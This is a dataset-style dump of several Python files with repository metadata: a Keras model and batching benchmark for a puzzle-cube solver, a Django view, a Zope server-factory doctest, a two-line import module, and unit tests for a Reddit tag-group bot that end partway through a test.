| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
736d5d990f966a7c1a4c1c7399dd9560dc58ed10
| 19,988
|
py
|
Python
|
helpers/batch_size_performance2.py
|
jasonrute/puzzle_cube_code
|
cf0238bc333d55e3637a4a6a4f408d16d4e14418
|
[
"MIT"
] | 2
|
2020-11-12T06:41:44.000Z
|
2022-02-27T13:50:38.000Z
|
helpers/batch_size_performance2.py
|
jasonrute/puzzle_cube_code
|
cf0238bc333d55e3637a4a6a4f408d16d4e14418
|
[
"MIT"
] | null | null | null |
helpers/batch_size_performance2.py
|
jasonrute/puzzle_cube_code
|
cf0238bc333d55e3637a4a6a4f408d16d4e14418
|
[
"MIT"
] | 2
|
2018-05-22T02:40:23.000Z
|
2018-07-28T11:14:41.000Z
|
import numpy as np
neighbors = \
np.array([[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 1, 0, -1, 4, 3,
-1, 12, 9, -1, -1, -1, 47, -1, -1, 50],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 2, 1, 0, 5, 4,
3, 15, 12, 9, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 2, 1, -1, 5,
4, -1, 15, 12, 18, -1, -1, 21, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, 1, 0, -1, 4, 3, -1, 7, 6,
-1, -1, -1, 47, -1, -1, 50, -1, -1, 53],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, 2, 1, 0, 5, 4, 3, 8, 7,
6, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 2, 1, -1, 5, 4, -1, 8,
7, 18, -1, -1, 21, -1, -1, 24, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, 4, 3, -1, 7, 6, -1, -1, -1,
-1, -1, -1, 50, -1, -1, 53, 30, 33, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, 5, 4, 3, 8, 7, 6, -1, -1,
-1, -1, -1, -1, -1, -1, -1, 27, 30, 33],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 5, 4, -1, 8, 7, -1, -1,
-1, 21, -1, -1, 24, -1, -1, -1, 27, 30],
[-1, -1, -1, -1, -1, -1, 1, 0, -1, -1, -1, -1, 12, 9, -1, -1, -1,
47, -1, -1, -1, 13, 10, -1, -1, -1, 46],
[-1, -1, -1, 12, 9, -1, -1, -1, 47, -1, -1, -1, 13, 10, -1, -1, -1,
46, -1, -1, -1, 14, 11, -1, -1, -1, 45],
[-1, -1, -1, 13, 10, -1, -1, -1, 46, -1, -1, -1, 14, 11, -1, -1, -1,
45, -1, -1, -1, -1, -1, -1, 37, 38, -1],
[-1, -1, -1, -1, -1, -1, 2, 1, 0, -1, -1, -1, 15, 12, 9, -1, -1,
-1, -1, -1, -1, 16, 13, 10, -1, -1, -1],
[-1, -1, -1, 15, 12, 9, -1, -1, -1, -1, -1, -1, 16, 13, 10, -1, -1,
-1, -1, -1, -1, 17, 14, 11, -1, -1, -1],
[-1, -1, -1, 16, 13, 10, -1, -1, -1, -1, -1, -1, 17, 14, 11, -1, -1,
-1, -1, -1, -1, -1, -1, -1, 36, 37, 38],
[-1, -1, -1, -1, -1, -1, -1, 2, 1, -1, -1, -1, -1, 15, 12, 18, -1,
-1, -1, -1, -1, -1, 16, 13, 19, -1, -1],
[-1, -1, -1, -1, 15, 12, 18, -1, -1, -1, -1, -1, -1, 16, 13, 19, -1,
-1, -1, -1, -1, -1, 17, 14, 20, -1, -1],
[-1, -1, -1, -1, 16, 13, 19, -1, -1, -1, -1, -1, -1, 17, 14, 20, -1,
-1, -1, -1, -1, -1, -1, -1, -1, 36, 37],
[-1, -1, -1, -1, -1, 2, -1, -1, 5, -1, -1, 15, -1, 18, -1, -1, 21,
-1, -1, -1, 16, -1, 19, -1, -1, 22, -1],
[-1, -1, 15, -1, 18, -1, -1, 21, -1, -1, -1, 16, -1, 19, -1, -1, 22,
-1, -1, -1, 17, -1, 20, -1, -1, 23, -1],
[-1, -1, 16, -1, 19, -1, -1, 22, -1, -1, -1, 17, -1, 20, -1, -1, 23,
-1, -1, -1, -1, -1, -1, 36, -1, -1, 39],
[-1, -1, 2, -1, -1, 5, -1, -1, 8, -1, 18, -1, -1, 21, -1, -1, 24,
-1, -1, 19, -1, -1, 22, -1, -1, 25, -1],
[-1, 18, -1, -1, 21, -1, -1, 24, -1, -1, 19, -1, -1, 22, -1, -1, 25,
-1, -1, 20, -1, -1, 23, -1, -1, 26, -1],
[-1, 19, -1, -1, 22, -1, -1, 25, -1, -1, 20, -1, -1, 23, -1, -1, 26,
-1, -1, -1, 36, -1, -1, 39, -1, -1, 42],
[-1, -1, 5, -1, -1, 8, -1, -1, -1, -1, 21, -1, -1, 24, -1, -1, -1,
27, -1, 22, -1, -1, 25, -1, -1, -1, 28],
[-1, 21, -1, -1, 24, -1, -1, -1, 27, -1, 22, -1, -1, 25, -1, -1, -1,
28, -1, 23, -1, -1, 26, -1, -1, -1, 29],
[-1, 22, -1, -1, 25, -1, -1, -1, 28, -1, 23, -1, -1, 26, -1, -1, -1,
29, -1, -1, 39, -1, -1, 42, -1, -1, -1],
[-1, 8, 7, -1, -1, -1, -1, -1, -1, 24, -1, -1, -1, 27, 30, -1, -1,
-1, 25, -1, -1, -1, 28, 31, -1, -1, -1],
[24, -1, -1, -1, 27, 30, -1, -1, -1, 25, -1, -1, -1, 28, 31, -1, -1,
-1, 26, -1, -1, -1, 29, 32, -1, -1, -1],
[25, -1, -1, -1, 28, 31, -1, -1, -1, 26, -1, -1, -1, 29, 32, -1, -1,
-1, -1, 42, 43, -1, -1, -1, -1, -1, -1],
[ 8, 7, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, 27, 30, 33, -1, -1,
-1, -1, -1, -1, 28, 31, 34, -1, -1, -1],
[-1, -1, -1, 27, 30, 33, -1, -1, -1, -1, -1, -1, 28, 31, 34, -1, -1,
-1, -1, -1, -1, 29, 32, 35, -1, -1, -1],
[-1, -1, -1, 28, 31, 34, -1, -1, -1, -1, -1, -1, 29, 32, 35, -1, -1,
-1, 42, 43, 44, -1, -1, -1, -1, -1, -1],
[ 7, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, 53, 30, 33, -1, -1, -1,
-1, -1, -1, 52, 31, 34, -1, -1, -1, -1],
[-1, -1, 53, 30, 33, -1, -1, -1, -1, -1, -1, 52, 31, 34, -1, -1, -1,
-1, -1, -1, 51, 32, 35, -1, -1, -1, -1],
[-1, -1, 52, 31, 34, -1, -1, -1, -1, -1, -1, 51, 32, 35, -1, -1, -1,
-1, 43, 44, -1, -1, -1, -1, -1, -1, -1],
[-1, 17, 14, 20, -1, -1, 23, -1, -1, -1, -1, -1, -1, 36, 37, -1, 39,
40, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[17, 14, 11, -1, -1, -1, -1, -1, -1, -1, -1, -1, 36, 37, 38, 39, 40,
41, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[14, 11, -1, -1, -1, 45, -1, -1, 48, -1, -1, -1, 37, 38, -1, 40, 41,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[20, -1, -1, 23, -1, -1, 26, -1, -1, -1, 36, 37, -1, 39, 40, -1, 42,
43, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, -1, 36, 37, 38, 39, 40, 41, 42, 43,
44, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[-1, -1, 45, -1, -1, 48, -1, -1, 51, 37, 38, -1, 40, 41, -1, 43, 44,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[23, -1, -1, 26, -1, -1, -1, 29, 32, -1, 39, 40, -1, 42, 43, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, 29, 32, 35, 39, 40, 41, 42, 43, 44, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[-1, -1, 48, -1, -1, 51, 32, 35, -1, 40, 41, -1, 43, 44, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],
[10, -1, -1, -1, 46, -1, -1, 49, -1, 11, -1, -1, -1, 45, -1, -1, 48,
-1, -1, -1, -1, 38, -1, -1, 41, -1, -1],
[ 9, -1, -1, -1, 47, -1, -1, 50, -1, 10, -1, -1, -1, 46, -1, -1, 49,
-1, 11, -1, -1, -1, 45, -1, -1, 48, -1],
[-1, -1, -1, 0, -1, -1, 3, -1, -1, 9, -1, -1, -1, 47, -1, -1, 50,
-1, 10, -1, -1, -1, 46, -1, -1, 49, -1],
[-1, 46, -1, -1, 49, -1, -1, 52, -1, -1, 45, -1, -1, 48, -1, -1, 51,
-1, 38, -1, -1, 41, -1, -1, 44, -1, -1],
[-1, 47, -1, -1, 50, -1, -1, 53, -1, -1, 46, -1, -1, 49, -1, -1, 52,
-1, -1, 45, -1, -1, 48, -1, -1, 51, -1],
[ 0, -1, -1, 3, -1, -1, 6, -1, -1, -1, 47, -1, -1, 50, -1, -1, 53,
-1, -1, 46, -1, -1, 49, -1, -1, 52, -1],
[-1, 49, -1, -1, 52, -1, 34, -1, -1, -1, 48, -1, -1, 51, -1, 35, -1,
-1, 41, -1, -1, 44, -1, -1, -1, -1, -1],
[-1, 50, -1, -1, 53, -1, 33, -1, -1, -1, 49, -1, -1, 52, -1, 34, -1,
-1, -1, 48, -1, -1, 51, -1, 35, -1, -1],
[ 3, -1, -1, 6, -1, -1, -1, -1, -1, -1, 50, -1, -1, 53, -1, 33, -1,
-1, -1, 49, -1, -1, 52, -1, 34, -1, -1]])
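# Added annotation: each of the 54 rows appears to map one cube sticker to
# the 27 stickers of its 3x3x3 neighborhood (including itself, at position
# 13); -1 marks a position off the cube surface and is remapped to 54 below,
# which indexes the zero-padded slot appended by special_cube_conv.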
def starting_model3d():
"""
Build and return a new neural network using the current model architecture
"""
import numpy as np
from keras.models import Model
from keras.layers import Conv2D, Input, BatchNormalization, Dense, Flatten, Activation, add, Lambda, Reshape
from keras.optimizers import Adam
from keras.losses import categorical_crossentropy
from keras.regularizers import l2
import keras.backend as K
import tensorflow as tf
neighbors[neighbors == -1] = 54
def special_cube_conv(in_tensor, filter_size):
"""
Takes in a None (samples) x 54 x ? (filters) tensor.
It embeds it into a 5 x 5 grid, and does a 3D convolution
using only the nodes in the original embedding.
To speed things up, it actually does the following:
- pads the end with a zero (in the last dimension):
None (samples) x 55 x ? (filters) (neighbors)
- align neighbors to get an output of dim:
None (samples) x 54 x 27 x ? (filters) (neighbors)
- 2d convolution with filter (1, 27) and no padding to get an output of dim:
None (samples) x 54 x filter_size
- reshape to remove last dimension:
None (samples) x filter_size x 54
"""
# pad (output dim: None x 55 x ?)
padded = Lambda(lambda x: K.temporal_padding(x, (0, 1)))(in_tensor) # just pad end
# align neighbors (output dim: None x 54 x 27 x ?)
#aligned = K.gather(padded, neighbors)
#aligned = padded[ neighbors[np.newaxis].astype(np.int32), :]
aligned = Lambda(lambda x: tf.gather(x, neighbors, axis=1))(padded)
# 2D convolution in one axis (output dim: None x 54 x 1 x filter_size)
conv = Conv2D(filter_size, kernel_size=(1, 27),
strides=(1, 1),
padding='valid',
data_format="channels_last",
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(aligned)
# reshape (output dim: None x 54 x filter_size)
out_tensor = Lambda(lambda x: K.squeeze(x, axis=2))(conv)
return out_tensor
def conv_block(in_tensor, filter_size):
conv = special_cube_conv(in_tensor, filter_size)
batch = BatchNormalization(axis=1)(conv)
relu = Activation('relu')(batch)
return relu
def residual_block(in_tensor, filter_size):
conv1 = special_cube_conv(in_tensor, filter_size)
batch1 = BatchNormalization(axis=1)(conv1)
relu1 = Activation('relu')(batch1)
conv2 = special_cube_conv(relu1, filter_size)
batch2 = BatchNormalization(axis=1)(conv2)
combine = add([batch2, in_tensor])
relu = Activation('relu')(combine)
return relu
def policy_block(in_tensor, filter_size, hidden_size):
conv = conv_block(in_tensor, filter_size=filter_size)
flat = Flatten()(conv)
hidden = Dense(hidden_size, activation='relu',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(flat)
output = Dense(12, activation='softmax',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001),
name='policy_output')(hidden)
return output
def value_block(in_tensor, filter_size, hidden_size):
conv = conv_block(in_tensor, filter_size=filter_size)
flat = Flatten()(conv)
hidden = Dense(hidden_size, activation='relu',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(flat)
output = Dense(1, activation='sigmoid',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001),
name='value_output')(hidden)
return output
# the network
state_input = Input(shape=(54, 6), name='state_input')
# convolutional
block = conv_block(state_input, filter_size=64)
# multiple residuals
block = residual_block(block, filter_size=64)
block = residual_block(block, filter_size=64)
block = residual_block(block, filter_size=64)
block = residual_block(block, filter_size=64)
# policy head
policy_output = policy_block(block, filter_size=64, hidden_size=64)
# value head
value_output = value_block(block, filter_size=64, hidden_size=64)
# combine
model = Model(inputs=state_input, outputs=[policy_output, value_output])
model.compile(loss={'policy_output': categorical_crossentropy,
'value_output': 'mse'},
loss_weights={'policy_output': 1., 'value_output': 1.},
optimizer=Adam(lr=.001))
return model
def starting_model2d():
"""
Build and return a new neural network using the current model architecture
"""
import numpy as np
from keras.models import Model
from keras.layers import Conv2D, Input, BatchNormalization, Dense, Flatten, Activation, add, Lambda, Reshape
from keras.optimizers import Adam
from keras.losses import categorical_crossentropy
from keras.regularizers import l2
import keras.backend as K
import tensorflow as tf
neighbors[neighbors == -1] = 54
def special_cube_conv(in_tensor, filter_size):
"""
Takes in a None (samples) x 54 x ? (filters) tensor.
It embeds it into a 5 x 5 grid, and does a 3D convolution
using only the nodes in the original embedding.
To speed things up, it actually does the following:
- pads the end with a zero (in the last dimension):
None (samples) x 55 x ? (filters) (neighbors)
- align neighbors to get an output of dim:
None (samples) x 54 x 27 x ? (filters) (neighbors)
- 2d convolution with filter (1, 27) and no padding to get an output of dim:
None (samples) x 54 x filter_size
- reshape to remove last dimension:
None (samples) x filter_size x 54
"""
print("in ", in_tensor.shape)
# pad (output dim: None x 55 x ?)
padded = Lambda(lambda x: K.temporal_padding(x, (0, 1)))(in_tensor) # just pad end
print("padded", padded.shape)
# align neighbors (output dim: None x 54 x 27 x ?)
#aligned = K.gather(padded, neighbors)
#aligned = padded[ neighbors[np.newaxis].astype(np.int32), :]
aligned = Lambda(lambda x: tf.gather(x, neighbors, axis=1))(padded)
print("align ", aligned.shape)
# 2D convolution in one axis (output dim: None x 54 x 1 x filter_size)
conv = Conv2D(filter_size, kernel_size=(1, 27),
strides=(1, 1),
padding='valid',
data_format="channels_last",
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(aligned)
print("conv ", conv.shape)
# reshape (output dim: None x 54 x filter_size)
out_tensor = Lambda(lambda x: K.squeeze(x, axis=2))(conv)
return out_tensor
def conv_block(in_tensor, filter_size):
conv = special_cube_conv(in_tensor, filter_size)
batch = BatchNormalization(axis=1)(conv)
relu = Activation('relu')(batch)
return relu
def residual_block(in_tensor, filter_size):
conv1 = special_cube_conv(in_tensor, filter_size)
batch1 = BatchNormalization(axis=1)(conv1)
relu1 = Activation('relu')(batch1)
conv2 = special_cube_conv(relu1, filter_size)
batch2 = BatchNormalization(axis=1)(conv2)
combine = add([batch2, in_tensor])
relu = Activation('relu')(combine)
return relu
def policy_block(in_tensor, filter_size, hidden_size):
conv = conv_block(in_tensor, filter_size=filter_size)
flat = Flatten()(conv)
hidden = Dense(hidden_size, activation='relu',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(flat)
output = Dense(12, activation='softmax',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001),
name='policy_output')(hidden)
return output
def value_block(in_tensor, filter_size, hidden_size):
conv = conv_block(in_tensor, filter_size=filter_size)
flat = Flatten()(conv)
hidden = Dense(hidden_size, activation='relu',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001))(flat)
output = Dense(1, activation='sigmoid',
kernel_regularizer=l2(0.001),
bias_regularizer=l2(0.001),
name='value_output')(hidden)
return output
# the network
state_input = Input(shape=(54, 6), name='state_input')
# convolutional
block = conv_block(state_input, filter_size=32)
# 2 residuals
block = residual_block(block, filter_size=32)
block = residual_block(block, filter_size=32)
# policy head
policy_output = policy_block(block, filter_size=32, hidden_size=32)
# value head
value_output = value_block(block, filter_size=32, hidden_size=32)
# combine
model = Model(inputs=state_input, outputs=[policy_output, value_output])
model.compile(loss={'policy_output': categorical_crossentropy,
'value_output': 'mse'},
loss_weights={'policy_output': 1., 'value_output': 1.},
optimizer=Adam(lr=.001))
return model
import threading
import queue
class Task:
def __init__(self):
self.lock = threading.Condition()
self.input = None
self.output = None
class BatchProcessHelper:
def __init__(self):
self.lock = threading.RLock()
self._batch_size = 5
def get_batch_size(self):
with self.lock:
return self._batch_size
def decrement_batch_size(self):
with self.lock:
self._batch_size -= 1
def set_batch_size(self, batch_size):
with self.lock:
self._batch_size = batch_size
input_queue = queue.Queue()
def get_value(input_value):
task = Task()
# put the value on the queue to be processed
task.input = input_value
with task.lock:
input_queue.put(task) # put task on queue to be processed
task.lock.wait() # wait until task is processed
return task.output # return output
def batch_process(get_output, batch_process_helper):
import numpy as np
task_list = []
while True:
# retrieve items from the queue
task = input_queue.get()
task_list.append(task)
if len(task_list) >= batch_process_helper.get_batch_size():
array = np.array([task.input.squeeze(axis=0) for task in task_list])
policies, values = get_output([array, 0])
for p, v, task in zip(policies, values, task_list):
with task.lock:
task.output = [p, v]
task.lock.notify() # mark as being complete
task_list = []
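# Design note (added): batch_process and get_value together form a simple
# request-coalescing pattern -- many producer threads each enqueue a Task and
# block on its condition variable, while this single consumer drains the
# queue, runs one batched forward pass, and notifies every waiting thread.
# One caveat of the sketch as written: the batch only fires once batch_size
# tasks have arrived, so a trailing partial batch would wait indefinitely; a
# production version would also flush on a timeout.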
if __name__ == '__main__':
import time
from keras import backend as K
model = starting_model3d()
get_output = K.function([model.input, K.learning_phase()], [model.output[0], model.output[1]])
batch_process_helper = BatchProcessHelper()
worker = threading.Thread(target=batch_process, args=(get_output, batch_process_helper,))
worker.daemon = True
worker.start()
# just use random data
inputs = np.random.choice(2, size=(2**10, 54, 6), p=[48/54, 6/54]).astype(bool)
for i in range(11):
batch_size = 2**i
print()
print("batch size:", 2**i)
my_inputs = inputs.copy().reshape((-1, batch_size, 54, 6))
t1 = time.time()
for batch in my_inputs:
get_output([batch, 0])
print("get_output ", "time:", time.time() - t1)
t1 = time.time()
for batch in my_inputs:
model.predict(batch)
print("predict ", "time:", time.time() - t1)
t1 = time.time()
for batch in my_inputs:
model.predict(batch, batch_size=2**i)
print("predict(batch_size=)", "time:", time.time() - t1)
my_inputs = inputs.copy().reshape((-1, 1, 54, 6))
batch_process_helper.set_batch_size(batch_size)
t1 = time.time()
threads = []
for batch in my_inputs:
t = threading.Thread(target=get_value, args=(batch, ))
threads.append(t)
t.start()
for t in threads:
t.join()
print("get_value ", "time:", time.time() - t1)
| 42.800857
| 112
| 0.480989
| 3,089
| 19,988
| 3.026222
| 0.085788
| 0.153188
| 0.150513
| 0.143774
| 0.846277
| 0.830445
| 0.80659
| 0.793325
| 0.782306
| 0.747112
| 0
| 0.160243
| 0.324995
| 19,988
| 466
| 113
| 42.892704
| 0.532612
| 0.115019
| 0
| 0.467066
| 0
| 0
| 0.02442
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056886
| false
| 0
| 0.065868
| 0
| 0.170659
| 0.02994
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
73d943a5e3f0c4d90fb711cc7e693ecd49e903b0
| 160
|
py
|
Python
|
EjercicioDjango0/django0peliculas/views.py
|
carlos3xc/AII-Exercises
|
c88d5b6f65b4774a9a4ae30d8a85e15537540c9d
|
[
"MIT"
] | null | null | null |
EjercicioDjango0/django0peliculas/views.py
|
carlos3xc/AII-Exercises
|
c88d5b6f65b4774a9a4ae30d8a85e15537540c9d
|
[
"MIT"
] | null | null | null |
EjercicioDjango0/django0peliculas/views.py
|
carlos3xc/AII-Exercises
|
c88d5b6f65b4774a9a4ae30d8a85e15537540c9d
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
def index(request):
return HttpResponse("Página principal del EjercicioDjango0.")
| 26.666667
| 65
| 0.8125
| 19
| 160
| 6.842105
| 0.789474
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007143
| 0.125
| 160
| 5
| 66
| 32
| 0.921429
| 0
| 0
| 0
| 0
| 0
| 0.2375
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
73fbf91d6c2ab3e17ea33140f30bcd64e858f4a0
| 3,162
|
py
|
Python
|
src/zope/app/server/tests/test_server.py
|
zopefoundation/zope.app.server
|
e0734fdc7327a1b41542b664eb745fa4299c2a57
|
[
"ZPL-2.1"
] | null | null | null |
src/zope/app/server/tests/test_server.py
|
zopefoundation/zope.app.server
|
e0734fdc7327a1b41542b664eb745fa4299c2a57
|
[
"ZPL-2.1"
] | 6
|
2017-10-30T14:56:41.000Z
|
2020-11-11T14:08:19.000Z
|
src/zope/app/server/tests/test_server.py
|
zopefoundation/zope.app.server
|
e0734fdc7327a1b41542b664eb745fa4299c2a57
|
[
"ZPL-2.1"
] | 1
|
2015-04-03T08:06:09.000Z
|
2015-04-03T08:06:09.000Z
|
##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Tests for zope.app.server.server
"""
import doctest
from zope.component import provideUtility
from zope.app.testing import setup
def doctest_ServerFactory():
r"""Tests for ServerFactory
Zope 3 has many server types -- HTTP, FTP, HTTP with postmortem debugging,
etc. All of them are registered as IServerType utilities in ZCML.
>>> setup.placelessSetUp()
>>> from zope.interface import implementer
>>> from zope.app.server.servertype import IServerType
>>> @implementer(IServerType)
... class MyServerType:
... def create(self, name, task_dispatcher, db, port='unknown',
... verbose='unspecified', ip=''):
... if not ip:
... ip = '*' # listen on all interfaces
... return ('%s server on %s:%d, registered with %s,\n'
... 'serving from %s, verbosity %s'
... % (name, ip, port, task_dispatcher, db, verbose))
>>> provideUtility(MyServerType(), IServerType, name='HTTP')
>>> provideUtility(MyServerType(), IServerType, name='FTP')
ServerFactory is used to hook into ZConfig and create instances of servers
specified in zope.conf. It gets a `section` argument that contains
settings specified in a ZConfig <server> section.
>>> class ServerSectionStub:
... type = 'HTTP'
... address = ('', 8080)
... verbose = False
>>> my_section = ServerSectionStub()
>>> from zope.app.server.server import ServerFactory
>>> sf = ServerFactory(my_section)
The server factory object knows how to create a server, given a task
dispatcher (see IDispatcher from zope.server.interfaces) and a ZODB
database object.
>>> task_dispatcher = 'my task dispatcher'
>>> db = 'my db'
>>> print(sf.create(task_dispatcher, db))
HTTP server on *:8080, registered with my task dispatcher,
serving from my db, verbosity False
The settings actually work
>>> my_section.type = 'FTP'
>>> my_section.address = ('127.0.0.1', 8021)
>>> my_section.verbose = True
>>> sf = ServerFactory(my_section)
>>> print(sf.create(task_dispatcher, db))
FTP server on 127.0.0.1:8021, registered with my task dispatcher,
serving from my db, verbosity True
That's it.
>>> setup.placelessTearDown()
"""
def test_suite():
return doctest.DocTestSuite()
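# Added annotation: doctest.DocTestSuite() collects the interactive examples
# embedded in this module's docstrings -- including doctest_ServerFactory
# above -- and wraps each one as a unittest-compatible test case.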
| 36.767442
| 78
| 0.599937
| 355
| 3,162
| 5.307042
| 0.416901
| 0.066879
| 0.042463
| 0.02017
| 0.125265
| 0.08811
| 0.057325
| 0.057325
| 0.057325
| 0.057325
| 0
| 0.014755
| 0.249842
| 3,162
| 85
| 79
| 37.2
| 0.779511
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| true
| 0
| 0.428571
| 0.142857
| 0.857143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
fb6e554f9fc2e86c5ad2e4a88425f3bedd735ca9
| 74
|
py
|
Python
|
credentialdigger/models/__init__.py
|
Soontao/credential-digger
|
365eedca3eaec201503441046ba0c37937db69e1
|
[
"Apache-2.0"
] | null | null | null |
credentialdigger/models/__init__.py
|
Soontao/credential-digger
|
365eedca3eaec201503441046ba0c37937db69e1
|
[
"Apache-2.0"
] | null | null | null |
credentialdigger/models/__init__.py
|
Soontao/credential-digger
|
365eedca3eaec201503441046ba0c37937db69e1
|
[
"Apache-2.0"
] | null | null | null |
from .path_model import PathModel
from .snippet_model import SnippetModel
| 24.666667
| 39
| 0.864865
| 10
| 74
| 6.2
| 0.7
| 0.354839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 74
| 2
| 40
| 37
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fba6df9af45d877682919dc978d0fef6ce817e6b
| 3,414
|
py
|
Python
|
tests/tagtrain/test_add_me.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | null | null | null |
tests/tagtrain/test_add_me.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | 7
|
2020-03-24T17:54:31.000Z
|
2021-09-21T12:34:34.000Z
|
tests/tagtrain/test_add_me.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from unittest.mock import MagicMock, patch
from tagtrain import data
from . import fake
from tagtrain.tagtrain.tt_add_me import AddMe
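# Note: mock.patch decorators are applied bottom-up, so the decorator closest
# to each function (by_owner.find_group) is injected as the first mock
# argument, followed by by_member.add_user_to_group.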
@patch('tagtrain.data.by_member.add_user_to_group')
@patch('tagtrain.data.by_owner.find_group')
def test_unknown_group(find_group, add_user_to_group):
find_group.side_effect = data.Group.DoesNotExist()
app, reply, message, match = fake.create_all()
AddMe(app).run(reply, message, match)
find_group.assert_called_once_with('OwnerName', 'GroupName')
add_user_to_group.assert_not_called()
reply.append.assert_called_once_with('User `OwnerName` does not have a Group `GroupName`. Skipping.')
@patch('tagtrain.data.by_member.add_user_to_group')
@patch('tagtrain.data.by_owner.find_group')
def test_existing_member(find_group, add_user_to_group):
group = fake.create_group(name='GroupName', member_count=1, locked=None)
find_group.return_value = group
add_user_to_group.return_value = (group, False)
app, reply, message, match = fake.create_all()
AddMe(app).run(reply, message, match)
find_group.assert_called_once_with('OwnerName', 'GroupName')
add_user_to_group.assert_called_once_with('OwnerName', 'GroupName', 'AuthorName', 'PermaLink')
reply.append.assert_called_once_with("You are already a Member of `OwnerName`'s Group `GroupName`. Skipping.")
@patch('tagtrain.data.by_member.add_user_to_group')
@patch('tagtrain.data.by_owner.find_group')
def test_group_locked(find_group, add_user_to_group):
group = fake.create_group(name='GroupName', member_count=1, locked=datetime.utcnow())
find_group.return_value = group
add_user_to_group.return_value = (group, False)
app, reply, message, match = fake.create_all()
AddMe(app).run(reply, message, match)
find_group.assert_called_once_with('OwnerName', 'GroupName')
add_user_to_group.assert_not_called()
reply.append.assert_called_once_with("Group `GroupName` is locked. Only `OwnerName` can add you. Skipping.")
@patch('tagtrain.data.by_member.add_user_to_group')
@patch('tagtrain.data.by_owner.find_group')
def test_good(find_group, add_user_to_group):
group = fake.create_group(name='GroupName', member_count=1, locked=None)
find_group.return_value = group
add_user_to_group.return_value = (group, True)
app, reply, message, match = fake.create_all()
AddMe(app).run(reply, message, match)
find_group.assert_called_once_with('OwnerName', 'GroupName')
